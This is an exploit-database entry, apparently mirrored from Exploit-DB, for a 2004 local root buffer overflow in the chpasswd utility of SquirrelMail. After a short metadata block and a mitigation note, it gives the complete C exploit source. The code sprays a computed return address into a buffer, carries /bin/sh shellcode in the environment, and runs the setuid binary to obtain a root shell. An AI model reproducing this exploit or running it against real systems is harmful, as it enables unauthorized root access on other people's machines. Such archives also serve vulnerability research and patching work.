header-logo
Suggest Exploit
vendor:
Squirremail
by:
x314
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Squirremail
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: SuSE 9
2004

Squirremail chpasswd buffer overflow

This exploit targets a buffer overflow vulnerability in Squirremail's chpasswd utility. It allows an attacker to gain root privileges on a system. The exploit takes advantage of a buffer overflow in the chpasswd program, allowing the execution of arbitrary code.

Mitigation:

The vendor should release a patch to fix the buffer overflow vulnerability in the chpasswd utility. Additionally, users should update to the latest version of Squirremail to ensure they are protected against this exploit.
Source

Exploit-DB raw data:

/*
* 0x3142-sq-chpasswd.c
* Squirremail chpasswd buffer overflow.
*
* Tested on SuSE 9.
* The bug was found by Matias Neiff <matias neiff com ar>
* Coded by x314 <0x3142 hushmail.com>
* (c) 2004 Copyright by x314.
* All Rights Reserved.
*
* Greets: m0s krewz. 
*
*/

#include <stdlib.h>

char shellcode[]=
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

int main(int argc, char *argv[])
{
char *env[2] = {shellcode, NULL};
int i;
long ret, *addr_ptr;
char *buffer, *ptr;

buffer = malloc(200);

printf("\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\n\n");

if(argc != 2) {
printf("Usage: %s <path-to-chpasswd>\n\n",argv[0]);
exit(0);
}

ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

// printf("Using ret = 0x%x\n\n", ret);

ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 200; i+=4)
{
*(addr_ptr++) = ret;
}

buffer[200-1] = 0;

execle(argv[1], "chpasswd", buffer, "0x314", "m0s", 0, env);

free(buffer);

return 0;
}




// milw0rm.com [2004-04-20]